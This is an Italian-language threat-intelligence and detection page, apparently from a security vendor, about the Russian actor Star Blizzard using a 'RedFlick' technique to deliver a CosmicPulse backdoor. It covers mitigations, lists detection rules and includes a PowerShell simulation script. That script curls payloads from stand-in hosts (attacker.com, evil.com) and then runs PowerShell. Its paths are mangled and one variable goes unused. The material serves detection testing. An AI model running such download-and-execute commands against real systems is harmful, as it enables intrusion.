Star Blizzard Utilizza RedFlick per Migliorare la Distribuzione di Phishing e Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
L’attore sponsorizzato dallo stato russo Star Blizzard ha evoluto le sue tattiche utilizzando la tecnica RedFlick per distribuire la backdoor CosmicPulse. L’attore si è spostato da spear-phishing altamente mirati a campagne di phishing automatizzate su larga scala utilizzando siti web compromessi. Queste campagne utilizzano metodi di consegna sofisticati, inclusi file VHDX e payload nascosti all’interno di file PDF per evadere il rilevamento.
Indagine
Microsoft Threat Intelligence ha analizzato varie ondate di phishing osservate nel corso del 2026, identificando una transizione da catene basate su ClickFix a compiti RedFlick programmati. L’indagine ha dettagliato un flusso di esecuzione multistadio che coinvolge file LNK, esecuzione di comandi locali SSH e l’uso di WebDAV per il recupero remoto dei payload. L’analisi tecnica ha anche scoperto l’uso della steganografia e della crittografia basata sul registro per il payload CosmicPulse.
Mitigazione
Le organizzazioni dovrebbero implementare autenticazioni resistenti al phishing e politiche di accesso condizionato per proteggere le identità. La protezione degli endpoint dovrebbe essere configurata con EDR in modalità blocco e protezione antivirus in tempo reale attivata. Inoltre, l’implementazione di regole di riduzione della superficie di attacco può prevenire l’esecuzione di script offuscati e file eseguibili non autorizzati.
Risposta
Al rilevamento, i team di sicurezza dovrebbero utilizzare l’EDR per sanare artefatti dannosi e indagare su tentativi di accesso sospetti. Le modalità di indagine automatica e di rimedio dovrebbero essere abilitate per ridurre i tempi di risposta. Le organizzazioni dovrebbero anche utilizzare soluzioni avanzate anti-phishing e Zero-hour auto purge per neutralizzare le comunicazioni dannose in arrivo.
Flusso di attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Riga di comando sospetta contiene percorso UNC con eseguibile come argomento (via cmdline)
Possibile scoperta delle condivisioni di rete (via cmdline)
Tentativi sospetti di installazione nascosta tramite installatore remoto MsiExec (via cmdline)
Conhost LOLBAS (via cmdline)
Possibile utilizzo di strumenti di tunneling [Windows] (via cmdline)
Uso sospetto di CURL (via cmdline)
Comando e controllo sospetto tramite richiesta DNS di dominio di primo livello (TLD) insolito (via dns)
IOC (HashSha256) da rilevare: Star Blizzard affina phishing e distribuzione malware con la tecnica RedFlick
IOC (SourceIP) da rilevare: Star Blizzard affina phishing e distribuzione malware con la tecnica RedFlick
IOC (DestinationIP) da rilevare: Star Blizzard affina phishing e distribuzione malware con la tecnica RedFlick
Rileva esecuzione PowerShell da PDF scaricato [Windows Powershell]
Rilevamento tecnica RedFlick di Star Blizzard – Attività pianificate e esecuzione tramite linea di comando [Creazione processo su Windows]
Esecuzione di simulazione
-
Narrazione dell’attacco & Comandi: L’avversario distribuisce un’email di phishing contenente un link a un file dannoso. All’interazione, viene attivata una sequenza in cui
curlviene utilizzato per recuperare una seconda fase. Per mimetizzarsi con i processi di sistema, il comando è progettato per includere esplicitamente i terminiPowerShell,PDF(riferendosi alla fonte dell’attivazione), econhost.exenel testo della riga di comando per adattarsi alla logica della regola di rilevamento target. Lo scopo è eseguire un payload decodificato incorporato all’interno di una struttura PDF. -
Script di test di regressione:
# Script di simulazione per attivare la regola 'Rileva esecuzione PowerShell da PDF scaricato'. # Questo script costruisce una stringa di riga di comando che include tutte le quattro parole chiave richieste. $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF" $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Extracting from PDF...'; Start-Process conhost.exe}" # Eseguiamo tramite cmd per garantire che conhost.exe faccia parte dell'albero dei processi/contesto comandi Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extracting from PDF... using conhost.exe`"" -
Comandi di pulizia:
# Pulisci i file generati durante la simulazione Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue